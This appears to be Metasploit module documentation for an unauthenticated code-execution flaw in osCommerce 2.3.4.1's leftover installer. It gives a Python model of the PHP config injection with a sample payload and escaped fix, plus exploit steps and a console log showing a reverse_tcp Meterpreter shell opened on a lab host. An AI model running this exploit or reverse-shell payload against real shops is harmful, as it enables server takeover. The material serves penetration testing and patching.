## Vulnerable Application
osCommerce version 2.3.4.1 is vulnerable to unauthenticated remote code execution. If the `/install/` directory was not removed after setup, anyone can request the installer script `install_4.php`, which writes the installation's configuration file from the values submitted to it. Because those values are written into the file without sanitisation, an attacker can inject PHP code into the configuration file and have it executed by the web server. Any deployment that still serves `/install/` is exposed; deleting the directory once installation is complete closes the hole.
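The mechanism above, as an added example that is not osCommerce's or the Metasploit module's code: an installer that writes form values into a PHP configuration file as single-quoted string literals, interpolated verbatim, lets a value containing a quote end the literal and turn the rest of the value into executable PHP. `TEMPLATE` is a simplified stand-in for the generated configuration file (the real file defines many more constants), `PAYLOAD` is a constructed sample value, and the tokenizer only models single-quoted PHP strings, which is enough to show whether the injected statement escaped its literal.

```python
"""Model of an installer that writes submitted settings into a PHP config file.

Added example; not osCommerce's or Metasploit's code. Shows why interpolating
installer form values verbatim into define('NAME', 'value') lines lets an
attacker append arbitrary PHP, and what the escaped version looks like.
"""

# Simplified stand-in for the generated configuration file (assumption: the
# real file emits many more constants in the same define('NAME', 'value') form).
TEMPLATE = (
    "<?php\n"
    "  define('DB_SERVER', '{DB_SERVER}');\n"
    "  define('DB_DATABASE', '{DB_DATABASE}');\n"
    "?>\n"
)

# Constructed attacker value: closes the literal and the define() call,
# appends a PHP statement, then opens a comment to swallow the trailing ');'.
MARKER = "injected"
PAYLOAD = "'); echo '" + MARKER + "'; /*"


def render_vulnerable(settings):
    """Interpolates submitted values verbatim, as an installer with no escaping does."""
    return TEMPLATE.format(**settings)


def php_single_quoted(value):
    """Escapes a value for a single-quoted PHP literal: only backslash and quote are special."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def render_fixed(settings):
    """Same template, but every value is escaped so it cannot leave its string literal."""
    return TEMPLATE.format(**{k: php_single_quoted(v) for k, v in settings.items()})


def code_outside_strings(php):
    """Returns the characters of `php` that sit outside single-quoted string
    literals, i.e. what PHP would parse as code (backslash escapes honoured)."""
    out, in_str, i = [], False, 0
    while i < len(php):
        c = php[i]
        if in_str:
            if c == "\\" and i + 1 < len(php):
                i += 2          # escaped character, still inside the string
                continue
            if c == "'":
                in_str = False  # closing quote
        elif c == "'":
            in_str = True       # opening quote
        else:
            out.append(c)
        i += 1
    return "".join(out)


def payload_executes(php):
    """True if the injected echo statement landed outside every string literal."""
    return "echo" in code_outside_strings(php)


def demo():
    """Renders the config with the malicious value both ways and returns
    (vulnerable_executes, fixed_executes); expected (True, False)."""
    settings = {"DB_SERVER": "localhost", "DB_DATABASE": PAYLOAD}
    return (payload_executes(render_vulnerable(settings)),
            payload_executes(render_fixed(settings)))


if __name__ == "__main__":
    print(render_vulnerable({"DB_SERVER": "localhost", "DB_DATABASE": PAYLOAD}))
    print(demo())
```

Running the script prints the poisoned configuration file, in which `echo 'injected';` is now a statement of its own, followed by `(True, False)`. Escaping the value is what a fixed installer would do; for a deployed shop the practical fix remains removing `/install/` so the script cannot be reached at all.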

## Verification Steps

1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip), leaving the `/install/` directory in place
2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
3. `set RHOST <target IP>`
4. `set PAYLOAD php/meterpreter/reverse_tcp`
5. `set LHOST <listener IP>`
6. `exploit`
7. **Verify** a new Meterpreter session is started

## Scenarios

### osCommerce version 2.3.4.1 on Debian

```
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
RHOST => 172.16.40.188
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit

[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (37543 bytes) to 172.16.40.188
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100

meterpreter > sysinfo
Computer : oscommerce
OS : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
Meterpreter : php/linux
meterpreter >
```